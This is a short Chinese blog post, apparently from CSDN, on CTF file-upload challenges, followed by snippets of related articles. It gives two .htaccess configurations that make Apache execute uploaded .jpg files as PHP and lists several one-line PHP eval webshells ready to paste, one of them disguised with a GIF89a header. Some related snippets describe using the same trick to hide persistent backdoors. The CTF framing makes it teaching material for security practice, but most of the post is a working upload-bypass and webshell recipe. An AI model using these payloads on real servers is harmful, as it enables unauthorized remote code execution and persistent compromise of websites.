CTF upload题目中.htaccess

最新推荐文章于 2024-04-22 17:07:01 发布
最新推荐文章于 2024-04-22 17:07:01 发布
阅读量853 收藏 1
点赞数 1
分类专栏: ctf 文章标签: php html web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56859693/article/details/120250837
版权

*蚁剑不能连jpg,只能连php*

.htaccess文件可以把jpg文件当作php文件来解析

文件上传upload方面有两个方法使用.htaccess进行jpg到php的转换

方法一:

先把一句话木马上传(bp改后缀,改content-type)

再上传文件.htaccess                                                   //文件名就叫.htaccess

内容为

AddType application/x-httpd-php .jpg

方法二:

先上传.htaccess文件(这个上传的时候也要改content-type)

内容为:

<FilesMatch "1">             //之后上传的文件名一定要为1.jpg或者1.png


SetHandler application/x-httpd-php


</FilesMatch>

上传成功后再上传一句话木马

另:常用一句话木马

<? @eval($_POST['cyh']);?>
GIF89a
<script language="php">eval($_POST['cyh']);</script>

我小皮超勇的
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF考核题目附件.zip
01-12
CTF考核题目附件.zip
2018强网杯CTF-题目整理.zip
12-17
2018强网杯CTF___题目整理
文件上传之.htaccess绕过黑名单——upload-labs靶场第四关
永远是少年
09-08 2140
今天继续给大家介绍渗透测试相关知识,本文主要内容是介绍.htaccess绕过黑名单的文件上传方法,并借助upload-labs靶场的第四关进行了实战。 一、.htaccess绕过简介 二、upload-labs靶场第四关简介 三、upload-labs靶场第四关实战
upload-labs 04(上传.htaccess
LuckySec
11-05 2174
题目 首先查看源码 该代码对常见的多种类型文件后缀名进行了限制上传, 但是仔细可以发现,并没有对htaccess文件进行限制。 于是,我们可以先上传一个htaccess文件,再上传一个图片马,进行绕过检测上传。 htaccess小知识 .htaccess文件(或者&amp;amp;quot;分布式配置文件&amp;amp;quot;),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录...
CTF-WEB篇 攻防世界题目实战解析upload1
最新发布
2301_76565920的博客
04-22 872
题目upload 知识点:一句话木马,webshell,burpsuite拦截并修改数据包
upload靶场第四关 .htaccess绕过方法
2301_79650865的博客
02-02 470
upload靶场第四关 使用.htaccess绕过方式 手把手教你如何创建.htaccess文件
Upload-labs Pass-04 .htaccess文件上传
baynk的博客
11-03 2000
Pass-04 .htaccess文件上传 0x01 过程 传php时,只有此文件不允许上传字样,burpsuite改个名查看一下。 和上关有点像,但是好像没有被重命名,可以试试apache的解析漏洞,test.php.xxxx.yyy这种不认识的后缀名会从右往左依次解析,不认识就往左移一个,像这个就会当作test.php处理,来,尝试一下。 访问一下,可以成功解析。 这就没了?不,我觉得...
htaccess文件的使用小技巧
qq_41814777的博客
07-26 435
0x00维持权限隐藏后门 一般我们上传的木马都是脚本文件,管理员进行定期检查的时候容易发现,但是可以通过配置htaccess,让后缀为jpg、png、jpeg、gif等文件以脚本文件解析,配置如下: <FilesMatch "jpg">   SetHandler application/x-httpd-php </FilesMatch> 0x01限制对敏感文件和后台的访问 在日常网站维护,很容易输入/login.php /login.html /admin.jsp 等目录
常规的CTF题目解析.pdf
08-07
从入门到高级的题目讲解,teacher g都有独到的见解。答题人与出题人的较量···文章和线上和线下的讲解。先是工具的准备,规划,如团队工作,和体力的补充。入门级的题目相信大家在线上都做过不少,都是考基本功...
CTF之二维码扫描.7z
12-02
CTF入门之二维码扫描神器,支持二维码修复
ctf比赛题目.zip
08-24
全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。...
apache .htaccess文件详解和配置技巧总结
01-10
一、.htaccess的基本作用        .htaccess是一个纯文本文件,它里面存放着Apache服务器配置相关的指令。       .htaccess主要的作用有:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。       .htaccess的用途范围主要针对当前目录。 二、启用.htaccess的配置启用.htaccess,需要修改httpd.conf,启用AllowOverride,并可以用AllowOverride限制特
CTF入门之php文件包含
qq_37410729的博客
07-23 2260
ctf-show web3,web4
将jpg文件当作php文件来解析,基于PHP实现通过照片获取ip地址_PHP
weixin_34599958的博客
04-06 774
基于PHP实现通过照片获取ip地址_PHP原创2016-05-27 10:18:350453在本教程,我们将学习如何用一张照片来盗取ip地址。我的想法是通过修改.htaccess文件,将jpg文件当作php文件来解析。下面就是我们需要向.htaccess添加的代码:AddHandler application/x-httpd-php5 .jpg然后将下面的代码复制到记事本,命名为gr...
upload-labs通关(Pass01-Pass05)
m0_46467017的博客
08-15 1676
我们在数据包把后缀名改为.php. .,首先他发现有一个点,这时会把他去掉,又发现有一个空格,也会把它去掉,我们这时还有一个点,也就是.php. 由于他只是验证一次,所以不会在去掉我们的点。我们在数据包把后缀名改为.php. .,首先他发现有一个点,这时会把他去掉,又发现有一个空格,也会把它去掉,我们这时还有一个点,也就是.php. 由于他只是验证一次,所以不会在去掉我们的点。本关也有两种绕过方法:第一种是上传php文件,改Content-Type,第二种是上次合法后缀文件,改文件改后缀。...
警惕htaccess文件上传解析漏洞
whatiwhere的博客
11-24 9398
实验环境 操作机: Windows XP 目标机:Windows 2003 目标网址:www.test.com 实验目的 了解htaccess文件解析的利用方法 掌握如何去修复此漏洞 实验工具 国菜刀:是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用国菜刀来进行管理,本次试验主要用到其动态脚本管理功能 实验内容 实验步骤 步骤1:...
.htaccess php设置,.htaccess更改php的配置
weixin_32230811的博客
03-29 771
php_value 在.htaccess 的使用1、php_value memory_limit 64M //设置记忆缓存大小2、ErrorDocument 404 errors/404.html //指定404错误的页面3、DirectoryIndex index.html index.php index.htm //设置首页默认访问的文件名以及各式4、Redirect 301 /old/fi...
将jpg文件当作php文件来解析,解析漏洞
weixin_34502439的博客
04-06 1576
1、漏洞简介解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。2、漏洞成因、检测及利用使用了低版本的,存在漏洞的web服务器。解析漏洞有以下几种:IIS 5.x/6.0解析漏洞目录解析:在网站下建立文件夹的名称带有.asp、.asa等可执行脚本文件后缀为后缀的文件夹,其目录内的任何...
.htaccess文件上传CTF讲解
hxhxhxhxx的博客
07-06 3350
.htaccess文件上传CTF详解题目解法方法2 题目 解法 我们先写一个htaccess文件 通过它调用php解析器去解析一个文件名只要包含"haha"这个字符串的任意文件,无论扩展名是什么(没有也行),都会以php的方式来解析 <FilesMatch "haha"> SetHandler application/x-httpd-php </FilesMatch> 或者如下,上传一个文件名为evil.gif的图片马: <FilesMatch "evil.gi
ctfhub .htaccess
10-09
CTFHub,可以使用.htaccess文件进行以下操作: 1. 限制访问:通过.htaccess文件,可以设置密码保护,只有知道密码的用户才能访问该目录。 2. 重定向:可以将特定URL重定向到其他URL。这在管理网站流量和更改URL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值